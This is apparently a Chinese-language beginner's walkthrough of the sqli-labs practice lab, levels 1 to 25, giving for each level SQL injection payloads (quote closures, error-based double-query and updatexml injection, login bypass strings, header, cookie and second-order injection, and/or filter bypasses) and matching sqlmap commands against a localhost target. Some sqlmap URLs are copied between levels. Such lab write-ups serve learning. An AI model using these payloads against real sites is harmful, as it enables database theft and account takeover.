最近几天突然想把sql注入复习一下,于是找到了sqli-lab,附上解题思路过程,新手,大佬们轻喷哈,有错误的地方望批评指正
Less1
比较简单,这是一道GET基于报错的SQL注入,是单引号闭合类型,采用?id=1' --+就能闭合,然后就可以使用语句查询,或者使用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs --batch就能完成
Less2
这是一道GET基于报错的SQL注入,是数字类型,直接在?id=1后面加上查询语句即可,或者使用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-2/?id=1" --dbs --batch
Less3
这是一道GET基于报错的SQL注入,是括号加单引号类型,采用?id=1') --+就能闭合,然后就可以使用语句查询,或者使用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-3/?id=1" --dbs --batch就能完成
Less4
这是一道GET基于报错的SQL注入,开始像往常一样用?id=1'不报错,然后改为用\,报错暴露出是双引号闭合,采用?id=1" --+就能闭合,然后就可以使用语句查询,或者使用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-4/?id=1" --dbs --batch就能完成
Less5
这是一道双注入报错查询,?id=1'还是会报错,发现是单引号闭合,闭合后一直显示you are in.......可以考虑是基于时间盲注和布尔盲注,这两种最好用sqlmap跑,手工太麻烦,这里采用双注入报错查询,原理是count函数遇到group by会报错,采用语句:?id=1′ and (select 1 from (select count(),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)2))x from information_schema.tables group by x)a) –+得到
菜刀连接成功
利用sqlmap注入:执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --dbs --batch就能完成
Less6
和5一样,只是改成了双引号闭合,利用sqlmap执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --dbs --batch就能完成
Less7
和6一样利用sqlmap执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --dbs --batch就能完成
Less8
加上'和\不显示报错信息,可以考虑是布尔盲注,手工太费时间,要用ascii一个一个的去猜一般采用各个数据库和表名称的每个字母,所以采用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-8/?id=1" --dbs --technique B --batch
Less9
无论怎么加都不报错,可以考虑是基于时间的盲注,可以用sleep试一下能够探测出是单引号闭合,这种采用sqlmap比较方便快速,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" --dbs --technique T --batch
Less10
和Less一样是基于时间的盲注,只不过是双引号闭合,同样使用sqlmap,执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-10/?id=1" --dbs --technique T --batch
Less11
输入admin 123456,没进去,密码改为123456',报错出是单引号闭合,构造万能密码'or '1'='1,成功进入
或者用sqlmap,将bp抓包内容以txt格式保存在sqlmap根目录,执行命令python sqlmap.py -r target.txt --technique E --dbms mysql --batch
Less12
输入admin 123456,没进去,密码改为123456'提示密码错误,密码再试一次123456\,报错出双引号和括号,构造万能密码") or 1=1 # 成功进入
或者直接用sqlmap执行命令python sqlmap.py -r target.txt --technique E --dbms mysql --batch
Less13
和12.13类似判断出报错为单引号括号,构造万能密码') or 1=1 # 成功进入
或者直接用sqlmap执行命令python sqlmap.py -r target.txt --technique E --dbms mysql --batch
Less14
同样的操作密码后面加\暴露出双引号,构造万能密码"or 1=1 #成功进入
或者直接用sqlmap执行命令python sqlmap.py -r target.txt --technique E --dbms mysql --batch
Less15
怎么操作都没有报错,考虑是布尔和时间盲注,直接用sqlmap执行命令python sqlmap.py -r target.txt --technique BT --dbms mysql --batch然而这种方法没跑出来qwq.....尝试使用另一种命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-15" --data "uname=admin&passwd=123456&submit=Submit" --dbs这样就出来了,data后面的内容是bp抓包最后一行提交的账号密码
Less16
和Less一样的反应,用sqlmap执行一样的命令(第二个命令)即可
Less17
会报出sql语法错误,但是无论怎么输入都是一个界面,看见提示里面有个update就想起用updatexml,用bp抓包,发现只有在passwd后面加才会有报错,闭合是单引号,于是闭合后用update(1,concat(0x7e,查询语句,0x7e),1)
发现有报错qwq,前面加上and 试试
成功,然后就可以各种语句来查询
既然只有passwd有注入,能出现报错,使用sqlmap时用-p passwd和E,执行命令python sqlmap.py -r target.txt --technique E --dbs --batch
Less18
直接bp抓包,对账号密码各种探测都不行,考虑一下是否为http头注入,当在User-Agent后面加上\时就会报错,是单引号闭合情况
采用or这种闭合情况,成功注入
然后便可以使用语句进行查询
针对这种http头注入使用sqlmap方法,bp抓包,保存,在User-Agent后面加上,执行命令python sqlmap.py -r target.txt --technique E --dbs --batch
Less19
和18一样判断是http头注入,注入点在Referer,同样的方法使用updatexml
使用sqlmap在Referer后面加上就行,执行命令python sqlmap.py -r target.txt --technique E --dbs --batch
Less20
采用上面几道题方法检测都不行,猜测是否是cookie注入,bp抓包
点击Follow redirection
在Proxy中放过直到找到cookie:uname=admin;这个内容,发送到repeater
对cookie进行注入探测发现是单引号闭合,同样用updatexml
然后就可以各种语句查询了
利用sqlmap进行Cookie注入:和之前一样bp抓包,内容以文本格式保存到sqlmap根目录,cookie一栏最后加上*,执行命令python sqlmap.py -r target.txt --technique E --dbs --level 3 --batch
Less21
和20一样向着cookie注入走,到达那个页面发现admin变成了base64编码的形式
那么我们用admin\也要转化为base64形式
暴露出单引号和括号
发现用--+会被过滤,但是#没有被过滤,采用#作注释,之前updatexml里面有0x7e,也就是~符号,在编码前就写成~,因为0x7e不是~的base64编码
然后放上去
这是什么原因我也不清楚了,之前‘) #就可以闭合,用这个语句就好像#被转义了一样没法注释,求大佬解释一下哇qwq...........
这个时候我们用联合查询语句来做
就能完成注入
sqlmap使用方法和20一样
Less22
和21一样只不过变成了双引号,做法参照21
Less23
发现是单引号闭合
--+和#都没起到注释的作用,被过滤了
既然后面有个'无法注视掉,那么我们就利用一下让它能闭合,构造语句?id=1' or '1'='1,然后就可以联合查询
完成注入
或者使用sqlmap执行命令python sqlmap.py -u "http://127.0.0.1/sqli/Less-23/?id=1" --dbs(被过滤字符这种类型都可以这种命令)
Less24
看见有注册应该是一个二次注入,目的是修改管理员admin的密码,注册一个新账户,用户名为admin'#,密码123456,登陆进去修改密码
新密码改为123,然后admin密码也被改为了123
Less25
很明显的提示了过滤了or和and,绕过方法可以用&&代替and,||代替or,或者双写结合大小写绕过用Oorr代替or,AandnD代替and,这两种方法都行
利用sqlmap,执行命令python sqlmap.py -u “url” –hex –dbs搞定